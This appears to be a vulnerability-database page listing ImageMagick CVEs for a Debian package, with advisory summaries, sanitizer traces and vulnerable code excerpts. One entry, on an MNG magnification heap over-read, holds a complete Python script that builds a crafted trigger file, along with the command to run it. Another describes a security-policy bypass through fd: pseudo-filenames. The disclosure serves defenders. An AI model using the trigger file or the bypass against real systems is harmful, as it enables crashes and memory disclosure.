Search for packages
| purl | pkg:deb/debian/imagemagick@0?distro=trixie |
| Vulnerability | Summary | Fixed by |
|---|---|---|
| This package is not known to be affected by vulnerabilities. | ||
| Vulnerability | Summary | Aliases |
|---|---|---|
| VCID-177y-cbh1-myay | ImageMagick: an integer overflow vulnerability in the function TIFFSeekCustomStream in coders/tiff.c |
CVE-2019-13136
|
| VCID-267c-s4sq-9bfw | ImageMagick: Use after free in ReadICCProfile function in coders/jpeg.c |
CVE-2019-17541
|
| VCID-2yv5-qdeg-9bag | ImageMagick: Magick.NET: ImageMagick: Denial of Service via heap write overflow in JXL encoder |
CVE-2026-40183
GHSA-jvgr-9ph5-m8v4 |
| VCID-3gtv-1gg5-5fh2 | Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. |
CVE-2022-0284
|
| VCID-3ju6-ah7s-suhh | ImageMagick: heap-based buffer overflow in ReadPSInfo in coders/ps.c |
CVE-2019-17540
|
| VCID-4dpv-a4ns-hye2 | ImageMagick: Possible arbitrary code execution by loading malicious configuration files or shared libraries |
CVE-2024-41817
|
| VCID-4p71-qkjb-97c6 | ImageMagick: Division by zero in ConvertXYZToJzazbz() of MagickCore/colorspace.c |
CVE-2021-20310
|
| VCID-4s37-h3p7-6uab | ImageMagick: Magick.NET: ImageMagick: Denial of Service via crafted image leading to out-of-bounds write |
CVE-2026-40169
GHSA-5592-p365-24xh |
| VCID-569d-6nue-5kbq | ImageMagick releases an invalid pointer in BilateralBlur when memory allocation fails The BilateralBlurImage method will allocate a set of double buffers inside AcquireBilateralTLS. But the last element in the set is not properly initialized. This will result in a release of an invalid pointer inside DestroyBilateralTLS when the memory allocation fails. |
CVE-2026-22770
GHSA-39h3-g67r-7g3c |
| VCID-5jx9-7bd4-f3hk | ImageMagick: Null-Pointer dereference in WriteOnePNGImage function in coders/png.c |
CVE-2017-11522
|
| VCID-5xqd-gf3b-4ygw | ImageMagick's Security Policy Bypass through config/policy-secure.xml via "fd handler" leads to stdin/stdout access The shipped “secure” security policy includes a rule intended to prevent reading/writing from standard streams: ```xml <policy domain="path" rights="none" pattern="-"/> ``` However, ImageMagick also supports fd:<n> pseudo-filenames (e.g., fd:0, fd:1). This path form is not blocked by the secure policy templates, and therefore bypasses the protection goal of “no stdin/stdout”. To resolve this, users can add the following change to their security policy. ```xml <policy domain="path" rights="none" pattern="fd:*"/> ``` And this will also be included in ImageMagick's more secure policies by default. |
CVE-2026-25966
GHSA-xwc6-v6g8-pw2h |
| VCID-6qqv-wf7w-xfaf | ImageMagick: heap-based buffer overflow at MagickCore/pixel-accessor.h in SetPixelViaPixelInfo because of a MagickCore/enhance.c error |
CVE-2019-13298
|
| VCID-6t7d-2hre-sqbw | ImageMagick has XMP profile write that triggers hang due to unbounded loop ### Summary Infinite lines occur when writing during a specific XMP file conversion command ### Details ``` #0 GetXmpNumeratorAndDenominator (denominator=<optimized out>, numerator=<optimized out>, value=<optimized out>) at MagickCore/profile.c:2578 #1 GetXmpNumeratorAndDenominator (denominator=<synthetic pointer>, numerator=<synthetic pointer>, value=720000000000000) at MagickCore/profile.c:2564 #2 SyncXmpProfile (image=image@entry=0x555555bb9ea0, profile=0x555555b9d020) at MagickCore/profile.c:2605 #3 0x00005555555db5cf in SyncImageProfiles (image=image@entry=0x555555bb9ea0) at MagickCore/profile.c:2651 #4 0x0000555555798d4f in WriteImage (image_info=image_info@entry=0x555555bc2050, image=image@entry=0x555555bb9ea0, exception=exception@entry=0x555555b7bea0) at MagickCore/constitute.c:1288 #5 0x0000555555799862 in WriteImages (image_info=image_info@entry=0x555555bb69c0, images=<optimized out>, images@entry=0x555555bb9ea0, filename=<optimized out>, exception=0x555555b7bea0) at MagickCore/constitute.c:1575 #6 0x00005555559650c4 in CLINoImageOperator (cli_wand=cli_wand@entry=0x555555b85790, option=option@entry=0x5555559beebe "-write", arg1n=arg1n@entry=0x7fffffffe2c7 "a.mng", arg2n=arg2n@entry=0x0) at MagickWand/operation.c:4993 #7 0x0000555555974579 in CLIOption (cli_wand=cli_wand@entry=0x555555b85790, option=option@entry=0x5555559beebe "-write") at MagickWand/operation.c:5473 #8 0x00005555559224aa in ProcessCommandOptions (cli_wand=cli_wand@entry=0x555555b85790, argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8, index=index@entry=1) at MagickWand/magick-cli.c:758 #9 0x000055555592276d in MagickImageCommand (image_info=image_info@entry=0x555555b824a0, argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8, metadata=metadata@entry=0x7fffffffbc10, exception=exception@entry=0x555555b7bea0) at MagickWand/magick-cli.c:1392 #10 0x00005555559216a0 in MagickCommandGenesis (image_info=image_info@entry=0x555555b824a0, command=command@entry=0x555555922640 <MagickImageCommand>, argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8, metadata=0x0, exception=exception@entry=0x555555b7bea0) at MagickWand/magick-cli.c:177 #11 0x000055555559f76b in MagickMain (argc=3, argv=0x7fffffffdfa8) at utilities/magick.c:162 #12 0x00007ffff700fd90 in __libc_start_call_main (main=main@entry=0x55555559aec0 <main>, argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8) at ../sysdeps/nptl/libc_start_call_main.h:58 #13 0x00007ffff700fe40 in __libc_start_main_impl (main=0x55555559aec0 <main>, argc=3, argv=0x7fffffffdfa8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdf98) at ../csu/libc-start.c:392 #14 0x000055555559f535 in _start () ``` ``` static void GetXmpNumeratorAndDenominator(double value, unsigned long *numerator,unsigned long *denominator) { double df; *numerator=0; *denominator=1; if (value <= MagickEpsilon) return; *numerator=1; df=1.0; while(fabs(df - value) > MagickEpsilon) { if (df < value) (*numerator)++; else { (*denominator)++; *numerator=(unsigned long) (value*(*denominator)); } df=*numerator/(double)*denominator; } } ``` In this code, the loop `while(fabs(df - value) > MagickEpsilon)` keeps repeating endlessly. ### PoC `magick hang a.mng` https://drive.google.com/file/d/1iegkwlTjqnJTtM4XkiheYsjKsC6pxtId/view?usp=sharing ### Impact XMP profile write triggers hang due to unbounded loop ### credits **Team Pay1oad DVE** **Reporter** : **Shinyoung Won** (with contributions from **WooJin Park, DongHa Lee, JungWoo Park, Woojin Jeon, Juwon Chae**, **Kyusang Han, JaeHun Gou**) **yosimich(@yosiimich**) **Shinyoung Won** of SSA Lab e-mail : [yosimich123@gmail.com] **Woojin Jeon** Gtihub : brainoverflow e-mail : [root@brainoverflow.kr] **WooJin Park** GitHub : jin-156 e-mail : [1203kids@gmail.com] **Who4mI(@GAP-dev) Lee DongHa of SSA Lab** Github: GAP-dev e-mail : [ceo@zeropointer.co.kr] **JungWoo Park** Github : JungWooJJING e-mail : [cuby5577@gmail.com] **Juwon Chae** Github : I_mho e-mail : [wndnjs4698@naver.com] **Kyusang Han** Github : T1deSEC e-mail : [hksjoe0081@gmail.com] **JaeHun Gou** Github : P2GONE e-mail : [charly20@naver.com] ### Commits Fixed in: https://github.com/ImageMagick/ImageMagick/commit/229fa96a988a21d78318bbca61245a6ed1ee33a0 and https://github.com/ImageMagick/ImageMagick/commit/38631605e6ab744548a561797472cf8648bcfe26 |
CVE-2025-53015
GHSA-vmhh-8rxq-fp9g |
| VCID-7cbm-nm6u-8kdp | ImageMagick: out-of-bounds read in enhance.c |
CVE-2016-6520
|
| VCID-7f35-ha1p-bbby | ImageMagick: heap-based buffer overflow in TIFFGetProfiles in coders/tiff.c |
CVE-2020-25667
|
| VCID-8bac-p2pq-vkf1 | Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. |
CVE-2022-2719
|
| VCID-93mt-5yvb-zfga | ImageMagick: heap-based buffer overflow in WriteTIFFImage in coders/tiff.c |
CVE-2019-15141
|
| VCID-b38j-8u7n-47ga | ImageMagick: Heap buffer over-read in the GetPixelIndex() function |
CVE-2017-11540
|
| VCID-b7u1-bftt-5kck | ImageMagick: heap-based buffer over-read in MagickCore/composite.c in CompositeImage |
CVE-2019-13303
|
| VCID-bd1g-sfsp-37h7 | ImageMagick: Stack buffer overflow in FTXT reader via oversized integer field ### Summary A stack-based buffer overflow exists in the ImageMagick FTXT image reader. A crafted FTXT file can cause out-of-bounds writes on the stack, leading to a crash. ``` ================================================================= ==3537074==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffee4850ef0 at pc 0x5607c408fb33 bp 0x7ffee484fe50 sp 0x7ffee484fe40 WRITE of size 1 at 0x7ffee4850ef0 thread T0 ``` |
CVE-2026-25967
GHSA-72hf-fj62-w6j4 |
| VCID-bum5-f5xb-akeg | ImageMagick: use-after-free in MngInfoDiscardObject in coders/png.c |
CVE-2019-19952
|
| VCID-bw4q-dt1r-y3e4 | ImageMagick has heap-based buffer overflow in UHDR encoder A heap-based buffer overflow in the UHDR encoder can happen due to truncation of a value and it would allow an out of bounds write. ``` ================================================================ ==2158399==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x521000039500 at pc 0x562a4a42f968 bp 0x7ffcca4ed6c0 sp 0x7ffcca4ed6b0 WRITE of size 1 at 0x521000039500 thread T0 ``` |
CVE-2026-30931
GHSA-h95r-c8c7-mrwx |
| VCID-dabd-m3mf-3ker | ImageMagick has Heap Buffer Over-Read in BilateralBlurImage BilateralBlurImage contains a heap buffer over-read caused by an incorrect conversion. When processing a crafted image with the `-bilateral-blur` operation an out of bounds read can occur. ``` ================================================================= ==676172==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50a0000079c0 at pc 0x57b483c722f7 bp 0x7fffc0acd380 sp 0x7fffc0acd370 READ of size 4 at 0x50a0000079c0 thread T0 ``` |
CVE-2026-30935
GHSA-cqw9-w2m7-r2m2 |
| VCID-dt8r-gjff-pqe4 | Multiple packages suffer from RUNPATH issues that may allow users in the "portage" group to escalate privileges. |
CVE-2005-3582
|
| VCID-fek5-ee6j-yqhv | ImageMagick: heap-based buffer over-read in GetImageDepth function |
CVE-2017-11753
|
| VCID-fx9z-gbbd-q7aq | Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. |
CVE-2017-12876
|
| VCID-g1e8-3nnr-gqff | ImageMagick: XML_PARSE_HUGE not properly restricted in coders/svg.c |
CVE-2019-18853
|
| VCID-gmm9-wk5j-gfh4 | ImageMagick: a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c |
CVE-2019-13134
|
| VCID-h6hy-g7da-1yg4 | Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. |
CVE-2023-34153
|
| VCID-h8cp-df76-c3dz | ImageMagick: NULL pointer dereference in LogOpenCLBuildFailure function in MagickCore/opencl.c |
CVE-2017-18250
|
| VCID-jn3z-marg-3qgz | ImageMagick: direct memory leaks in AcquireMagickMemory because of an error in CLIListOperatorImages in MagickWand/operation.c for a NULL value |
CVE-2019-13296
|
| VCID-jxwd-tm1k-yqa2 | Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. |
CVE-2017-13132
|
| VCID-kdw5-8y5z-zya5 | ImageMagick: Possible memory leak in ASHLAR encoder A memory leak in the ASHLAR image writer allows an attacker to exhaust process memory by providing a crafted image that results in small objects that are allocated but never freed. ``` ==880062== Memcheck, a memory error detector ==880062== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. ==880062== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info ==880062== ==880062== ==880062== HEAP SUMMARY: ==880062== in use at exit: 386,826 bytes in 696 blocks ==880062== total heap usage: 30,523 allocs, 29,827 frees, 21,803,756 bytes allocated ==880062== ==880062== LEAK SUMMARY: ==880062== definitely lost: 3,408 bytes in 3 blocks ==880062== indirectly lost: 88,885 bytes in 30 blocks ==880062== possibly lost: 140,944 bytes in 383 blocks ==880062== still reachable: 151,573 bytes in 259 blocks ==880062== suppressed: 0 bytes in 0 blocks ==880062== Reachable blocks (those to which a pointer was found) are not shown. ==880062== To see them, rerun with: --leak-check=full --show-leak-kinds=all ==880062== ==880062== For lists of detected and suppressed errors, rerun with: -s ==880062== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0) ``` |
CVE-2026-25637
GHSA-gm37-qx7w-p258 |
| VCID-ky7v-89bx-3qc8 | ImageMagick: out-of-bounds access in function LocaleLowercase in MagickCore/locale.c leads to SIGSEGV |
CVE-2019-10714
|
| VCID-m2q5-rtqv-tudu | ImageMagick: Stack-based buffer over-read in the ComputeResizeImage function |
CVE-2018-6930
|
| VCID-m4we-6udg-p7cj | ImageMagick: heap-based buffer over-read in MagickCore/fourier.c in ComplexImages |
CVE-2019-13302
|
| VCID-mcef-v74u-pke3 | ImageMagick: a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c |
CVE-2019-13133
|
| VCID-p31j-f9s2-quh9 | ImageMagick: use-after-free, heap-buffer-overflow triggered by GetPixelRed, GetPixelBlue in MagickCore/pixel-accessor.h |
CVE-2020-25663
|
| VCID-pp81-c241-rbb5 | ImageMagick: use-after-free in magick/blob.c resulting in a denial of service |
CVE-2019-14980
|
| VCID-q37s-1azj-xkhv | ImageMagick: Memory leak in Magick::Draw |
CVE-2023-39978
|
| VCID-qye1-pv1p-8fbp | ImageMagick: Memory allocation failure in AcquireMagickMemory (incomplete fix for CVE-2016-8862) |
CVE-2016-8866
|
| VCID-ra5y-ag3h-5yb8 | Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. |
CVE-2017-14248
|
| VCID-rghj-fgdd-nke7 | ImageMagick: heap-based buffer overflow in ReadTIM2ImageData() function in coders/tim2.c |
CVE-2023-34474
|
| VCID-rj9n-ra1t-77dy | ImageMagick has stack buffer overflow in MagnifyImage MagnifyImage uses a fixed-size stack buffer. When using a specific image it is possible to overflow this buffer and corrupt the stack. |
CVE-2026-30929
GHSA-rqq8-jh93-f4vg |
| VCID-s6bw-85wn-jygp | ImageMagick: Heap-buffer overflow in IsPixelGray in pixel-accessor.h (Incomplete fix for CVE-2016-9556) |
CVE-2016-9773
|
| VCID-t38m-c4zf-yqe6 | Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. |
CVE-2023-2157
|
| VCID-tw4r-9r9b-4qez | imagemagick: ImageMagick: heap-buffer overflow |
CVE-2025-55005
|
| VCID-u45q-eheh-6kak | ImageMagick: Incorrect Calculation of Buffer Size in ImageMagick's Multispectral MIFF Processing |
CVE-2025-46393
|
| VCID-ujad-kteu-sfdu | ImageMagick: stack overflow in coders/tiff.c while parsing malicious tiff file |
CVE-2023-3195
|
| VCID-ury3-3x4b-1qh2 | ImageMagick: NULL pointer dereference in BenchmarkOpenCLDevices in MagickCore/opencl.c |
CVE-2017-18210
|
| VCID-utsb-dc1p-jkcq | ImageMagick: heap-use-after-free in at dcm.c RelinquishDCMMemory |
CVE-2021-3962
|
| VCID-uvpj-a8v5-ebgz | Image Magick has a Memory Leak in coders/ashlar.c Memory leak exists in `coders/ashlar.c`. The `WriteASHLARImage` allocates a structure. However, when an exception is thrown, the allocated memory is not properly released, resulting in a potential memory leak. ``` ```bash ==78968== Memcheck, a memory error detector ==78968== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al. ==78968== Using Valgrind-3.22.0 and LibVEX; rerun with -h for copyright info ==78968== ==78968== HEAP SUMMARY: ==78968== in use at exit: 17,232 bytes in 4 blocks ==78968== total heap usage: 4,781 allocs, 4,777 frees, 785,472 bytes allocated ``` |
CVE-2026-25969
GHSA-xgm3-v4r9-wfgm |
| VCID-uwbu-vzay-q3ak | ImageMagick: NULL pointer dereference in GetMagickProperty function in MagickCore/property.c |
CVE-2018-16329
|
| VCID-vbdt-31wd-v3h8 | imagemagick: heap-buffer overflow read in MNG magnification with alpha ## **Vulnerability Details** When performing image magnification in `ReadOneMNGIMage` (in `coders/png.c`), there is an issue around the handling of images with separate alpha channels. When loading an image with a color type that implies a separate alpha channel (ie. `jng_color_type >= 12`), we will load the alpha pixels in this loop: ```c if (logging != MagickFalse) (void) LogMagickEvent(CoderEvent,GetMagickModule(), " Reading alpha from alpha_blob."); jng_image=ReadImage(alpha_image_info,exception); if (jng_image != (Image *) NULL) for (y=0; y < (ssize_t) image->rows; y++) { s=GetVirtualPixels(jng_image,0,y,image->columns,1,exception); q=GetAuthenticPixels(image,0,y,image->columns,1,exception); // [0] if ((s == (const Quantum *) NULL) || (q == (Quantum *) NULL)) break; if (image->alpha_trait != UndefinedPixelTrait) for (x=(ssize_t) image->columns; x != 0; x--) { SetPixelAlpha(image,GetPixelRed(jng_image,s),q); q+=(ptrdiff_t) GetPixelChannels(image); s+=(ptrdiff_t) GetPixelChannels(jng_image); } else for (x=(ssize_t) image->columns; x != 0; x--) { Quantum alpha; alpha=GetPixelRed(jng_image,s); SetPixelAlpha(image,alpha,q); if (alpha != OpaqueAlpha) image->alpha_trait=BlendPixelTrait; // [1] q+=(ptrdiff_t) GetPixelChannels(image); s+=(ptrdiff_t) GetPixelChannels(jng_image); } if (SyncAuthenticPixels(image,exception) == MagickFalse) break; } ``` Note that at \[1\] we update `image->alpha_trait`, but if our alpha image only contains non-opaque pixels in the last row, we do not call `GetAuthenticPixels` (at \[0\]) after this change has been made. The next call to `GetAuthenticPixels` will then call down into `ResetPixelChannelMap` which adds the new alpha channel to the image channel mappings and metadata. If we then pass this image into the `MAGN` chunk type, we can see that at \[2\] we calculate the sizes for intermediate buffers `next` and `prev`, before calling `GetAuthenticPixels` at \[4\]. After the call at \[4\], the `image->num_channels` has increased to include the new alpha channel, and now `length` and the previously allocated `next` and `prev` buffers are too small. Fortunately `length` is always used when copying into the buffers, but when reading pixels from the buffers, we call `GetPixelXXX` which assumes the layout of the current image, which requires a larger allocation. The pixel copying loop will subsequently read beyond the end of the allocation at \[5\]. ```c /* magnify the rows into the right side of the large image */ if (logging != MagickFalse) (void) LogMagickEvent(CoderEvent,GetMagickModule(), " Magnify the rows to %.20g", (double) large_image->rows); m=(ssize_t) mng_info->magn_mt; yy=0; length=(size_t) GetPixelChannels(image)*image->columns; // [2] next=(Quantum *) AcquireQuantumMemory(length,sizeof(*next)); prev=(Quantum *) AcquireQuantumMemory(length,sizeof(*prev)); if ((prev == (Quantum *) NULL) || (next == (Quantum *) NULL)) { if (prev != (Quantum *) NULL) prev=(Quantum *) RelinquishMagickMemory(prev); if (next != (Quantum *) NULL) next=(Quantum *) RelinquishMagickMemory(next); image=DestroyImageList(image); ThrowReaderException(ResourceLimitError, "MemoryAllocationFailed"); } n=GetAuthenticPixels(image,0,0,image->columns,1,exception); // [4] (void) memcpy(next,n,length); for (y=0; y < (ssize_t) image->rows; y++) { if (y == 0) m=(ssize_t) mng_info->magn_mt; else if (magn_methy > 1 && y == (ssize_t) image->rows-2) m=(ssize_t) mng_info->magn_mb; else if (magn_methy <= 1 && y == (ssize_t) image->rows-1) m=(ssize_t) mng_info->magn_mb; else if (magn_methy > 1 && y == (ssize_t) image->rows-1) m=1; else m=(ssize_t) mng_info->magn_my; n=prev; prev=next; next=n; if (y < (ssize_t) image->rows-1) { n=GetAuthenticPixels(image,0,y+1,image->columns,1, exception); (void) memcpy(next,n,length); } for (i=0; i < m; i++, yy++) { Quantum *pixels; assert(yy < (ssize_t) large_image->rows); pixels=prev; n=next; q=GetAuthenticPixels(large_image,0,yy,large_image->columns, 1,exception); if (q == (Quantum *) NULL) break; q+=(ptrdiff_t) (large_image->columns-image->columns)* GetPixelChannels(large_image); for (x=(ssize_t) image->columns-1; x >= 0; x--) { /* To do: get color as function of indexes[x] */ /* if (image->storage_class == PseudoClass) { } */ if (magn_methy <= 1) { /* replicate previous */ SetPixelRed(large_image,GetPixelRed(image,pixels),q); // [5] SetPixelGreen(large_image,GetPixelGreen(image, pixels),q); SetPixelBlue(large_image,GetPixelBlue(image, pixels),q); SetPixelAlpha(large_image,GetPixelAlpha(image, pixels),q); } ``` This can likely be used to leak subsequent memory contents into the output image. The attached proof-of-concept triggers this issue and is not blocked by any of the default security policies. ## **Affected Version(s)** The issue has been successfully reproduced: - at commit `3e37a7f15fcb1aa80e6beae3898e684309c2ecbe` - in stable release `7.1.2-0` ### **Build Instructions** ```shell git clone https://github.com/imagemagick/imagemagick cd imagemagick export CC=clang export CXX=clang++ export CFLAGS="-fsanitize=address -O0 -ggdb" export CXXFLAGS="-fsanitize=address -O0 -ggdb" export LDFLAGS="-fsanitize=address -O0 -ggdb" ./configure --disable-shared --disable-docs --with-jxl make -j ``` ## **Reproduction** ### **Test Case** This testcase is a python script that will generate an MNG file which can be used to trigger the vulnerability. ``` import struct import zlib def chunk(tag, data): crc = zlib.crc32(tag + data) & 0xffffffff return struct.pack('>I', len(data)) + tag + data + struct.pack('>I', crc) # Simple 128x1 RGB jpeg jpeg = bytes([ 0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46, 0x00, 0x01, 0x01, 0x01, 0x01, 0x2c, 0x01, 0x2c, 0x00, 0x00, 0xff, 0xdb, 0x00, 0x43, 0x00, 0x03, 0x02, 0x02, 0x03, 0x02, 0x02, 0x03, 0x03, 0x03, 0x03, 0x04, 0x03, 0x03, 0x04, 0x05, 0x08, 0x05, 0x05, 0x04, 0x04, 0x05, 0x0a, 0x07, 0x07, 0x06, 0x08, 0x0c, 0x0a, 0x0c, 0x0c, 0x0b, 0x0a, 0x0b, 0x0b, 0x0d, 0x0e, 0x12, 0x10, 0x0d, 0x0e, 0x11, 0x0e, 0x0b, 0x0b, 0x10, 0x16, 0x10, 0x11, 0x13, 0x14, 0x15, 0x15, 0x15, 0x0c, 0x0f, 0x17, 0x18, 0x16, 0x14, 0x18, 0x12, 0x14, 0x15, 0x14, 0xff, 0xdb, 0x00, 0x43, 0x01, 0x03, 0x04, 0x04, 0x05, 0x04, 0x05, 0x09, 0x05, 0x05, 0x09, 0x14, 0x0d, 0x0b, 0x0d, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0xff, 0xc0, 0x00, 0x11, 0x08, 0x00, 0x01, 0x00, 0x80, 0x03, 0x01, 0x11, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, 0xff, 0xc4, 0x00, 0x15, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0xff, 0xc4, 0x00, 0x14, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xc4, 0x00, 0x14, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xc4, 0x00, 0x14, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xda, 0x00, 0x0c, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3f, 0x00, 0xaa, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3f, 0xff, 0xd9 ]) # MNG File Construction mng_sig = b'\x8aMNG\r\n\x1a\n' mhdr_data = struct.pack('>IIIIIII', 1, 1, 1, 0, 0, 0, 0) mhdr_chunk = chunk(b'MHDR', mhdr_data) magn_data = struct.pack('>HH B H H H H H H B', 0, 0, 1, 2, 2, 2, 2, 2, 2, 1) magn_chunk = chunk(b'MAGN', magn_data) jhdr_data = struct.pack('>IIBBBBBBBB', 128, 1, 12, 8, 8, 0, 8, 0, 0, 0) jhdr_chunk = chunk(b'JHDR', jhdr_data) jdat_chunk = chunk(b'JDAT', jpeg) scanlines = b'\x00\x00'*128 compressed_scanlines = zlib.compress(scanlines) idat_chunk = chunk(b'IDAT', compressed_scanlines) iend_chunk = chunk(b'IEND', b'') mend_chunk = chunk(b'MEND', b'') mng_bytes = mng_sig + mhdr_chunk + magn_chunk + jhdr_chunk + jdat_chunk + idat_chunk + iend_chunk + mend_chunk with open("magn_read.mng", "wb") as tmp: tmp.write(mng_bytes) ``` ### **Command** ```shell python3 ./generate_testcase.py utilities/magick ./magn_read.mng -resize 200x200 PNG:output.png ``` ### **ASan Backtrace** ``` ================================================================= ==1562409==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x51b000000680 at pc 0x557a486b0c64 bp 0x7ffe63210de0 sp 0x7ffe63210dd8 READ of size 4 at 0x51b000000680 thread T0 #0 0x557a486b0c63 in GetPixelRed /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:405:10 #1 0x557a4869ce03 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6657:51 #2 0x557a48683c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9 #3 0x557a487a8f41 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15 #4 0x557a487abf36 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9 #5 0x557a48d747a8 in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4961:22 #6 0x557a48d6862c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5475:7 #7 0x557a48c3e3fb in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13 #8 0x557a48c3f7c9 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5 #9 0x557a48c3c13c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14 #10 0x557a482847b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10 #11 0x557a482841e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10 #12 0x7f1431833ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #13 0x7f1431833d64 in __libc_start_main csu/../csu/libc-start.c:360:3 #14 0x557a481a0790 in _start (/tmp/repro/imagemagick/utilities/magick+0x1f3790) (BuildId: c19eeda184f03d027903a515c023bed30e652cc3) 0x51b000000680 is located 0 bytes after 1536-byte region [0x51b000000080,0x51b000000680) allocated by thread T0 here: #0 0x557a482405c3 in malloc (/tmp/repro/imagemagick/utilities/magick+0x2935c3) (BuildId: c19eeda184f03d027903a515c023bed30e652cc3) #1 0x557a482b9b6a in AcquireMagickMemory /tmp/repro/imagemagick/MagickCore/memory.c:559:10 #2 0x557a482b9dba in AcquireQuantumMemory /tmp/repro/imagemagick/MagickCore/memory.c:677:10 #3 0x557a4869c58c in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6584:34 #4 0x557a48683c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9 #5 0x557a487a8f41 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15 #6 0x557a487abf36 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9 #7 0x557a48d747a8 in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4961:22 #8 0x557a48d6862c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5475:7 #9 0x557a48c3e3fb in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13 #10 0x557a48c3f7c9 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5 #11 0x557a48c3c13c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14 #12 0x557a482847b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10 #13 0x557a482841e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10 #14 0x7f1431833ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:405:10 in GetPixelRed Shadow bytes around the buggy address: 0x51b000000400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x51b000000480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x51b000000500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x51b000000580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x51b000000600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x51b000000680:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x51b000000700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x51b000000780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x51b000000800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x51b000000880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x51b000000900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc 